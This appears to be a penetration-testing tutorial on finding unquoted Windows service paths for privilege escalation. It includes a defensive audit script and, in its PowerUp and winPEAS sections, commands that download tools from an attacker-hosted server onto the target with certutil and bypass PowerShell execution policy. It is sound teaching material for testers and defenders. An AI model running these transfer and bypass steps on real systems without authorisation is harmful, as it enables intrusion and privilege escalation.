HUNTING FOR UNQUOTED SERVICES MANUALLY
The first thing we should check when we get a foothold is which privileges our current user holds, using:
whoami /priv
NOTE: The SeShutdown privilege allows restarting the machine. Typically you lack permission to stop or start a service directly; with SeShutdown, however, you can restart the machine, which indirectly restarts the service and facilitates exploitation. The SeShutdown privilege can still be used even when it is marked "Disabled", because it is only disabled for the current session.
We can manually hunt for unquoted service paths on the system from cmd.exe:
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
We can manually hunt for unquoted service paths on the system from PowerShell:
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName
NOTE: Both commands report that the unquotedsvc service has an unquoted service path and that its start mode is Manual.
To check the service's security descriptor and confirm whether our user has permission to start the service:
sc sdshow unquotedsvc
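The two one-liners above list every service whose binary path is unquoted, but an unquoted path only becomes ambiguous when it contains a space: the service control manager then tries each prefix that ends at a space (for example C:\Program.exe) before the full path. The audit script below, added here and not part of the original notes, applies the same filters as the one-liners (skip paths under the Windows directory and paths that already start with a quote), keeps only services whose executable path contains a space, reports the prefix locations that must stay non-writable for standard users, and prints the sc.exe config remediation that rewrites the path with embedded quotes. It assumes an elevated PowerShell 5.1 or later session on the host being audited; Get-CimInstance and Win32_Service are standard, the function name and the property names in the output are this example's own.

```powershell
# Added audit script, not part of the original notes. Assumes an elevated
# PowerShell 5.1+ session on the host being checked. Mirrors the page's
# filters: skip services under the Windows directory and any path that
# already starts with a quote.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        # Prefix to ignore, as the page's one-liners do with C:\Windows.
        [string]$ExcludePrefix = $env:SystemRoot
    )

    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            -not $_.PathName.StartsWith('"') -and
            -not $_.PathName.StartsWith($ExcludePrefix, [System.StringComparison]::OrdinalIgnoreCase)
        } |
        ForEach-Object {
            # Separate the executable from any arguments; only the executable
            # part is subject to the ambiguous-path lookup.
            $exePath = $_.PathName
            $exeArgs = ''
            if ($_.PathName -match '^(.*?\.exe)(\s.*)?$') {
                $exePath = $Matches[1]
                $exeArgs = if ($Matches[2]) { $Matches[2] } else { '' }
            }

            # An unquoted path without a space is parsed unambiguously, so it
            # needs no remediation and is not reported.
            if ($exePath -notmatch ' ') { return }

            # Every prefix ending at a space, with .exe appended, is a location
            # the service control manager probes before the real binary.
            $parts = $exePath -split ' '
            $candidates = @(
                for ($i = 1; $i -lt $parts.Count; $i++) {
                    ($parts[0..($i - 1)] -join ' ') + '.exe'
                }
            )

            [pscustomobject]@{
                Name       = $_.Name
                StartMode  = $_.StartMode
                RunsAs     = $_.StartName
                PathName   = $_.PathName
                # Locations that must not be writable by standard users.
                Candidates = $candidates
                # Remediation: store the binary path with embedded quotes.
                FixCommand = "sc.exe config $($_.Name) binPath= `"\`"$exePath\`"$exeArgs`""
            }
        }
}

# Usage: review the findings, then run each FixCommand from an elevated prompt.
Get-UnquotedServicePath | Format-List Name, StartMode, RunsAs, PathName, Candidates, FixCommand
```

A finding only matters when one of the Candidates' parent directories is writable by a low-privileged account and the service runs as a privileged account (RunsAs), which is the caveat the PowerUp note below makes; quoting the path with the FixCommand removes the ambiguity regardless.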
HUNTING FOR UNQUOTED SERVICES WITH POWERUP
If you don't already have PowerUp, you can download PowerUp.ps1 with the following command:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Host the PowerShell script using Python:
python3 -m http.server 8000
Transfer the script to the target machine using certutil:
certutil -urlcache -f http://[IP-ADDRESS]:8000/PowerUp.ps1 PowerUp.ps1
To bypass the PowerShell execution policy and execute PowerUp.ps1 in a single line:
powershell -ep bypass -c "& {.\PowerUp.ps1}"
NOTE: PowerUp.ps1 can enumerate misconfigurations and has built-in functions to exploit many of them. However, finding an unquoted service path doesn't always mean it's vulnerable. PowerUp recognizes the misconfiguration and suggests an AbuseFunction, assuming it is exploitable.
HUNTING FOR UNQUOTED SERVICES WITH WINPEAS
Since the target runs a 64-bit OS, we can serve the 64-bit winPEAS binary from a Python HTTP server:
python3 -m http.server 8000
Transfer winPEAS to the target machine using certutil:
certutil -urlcache -f http://[IP-ADDRESS]:8000/winPEASx64.exe winPEASx64.exe
winPEAS has filters for the Services Information category that find unquoted service paths:
.\winPEASx64.exe quiet servicesinfo
NOTE: Sharpen your eagle eye to quickly find important data in the winPEAS output by paying attention to the red and yellow highlighted sections.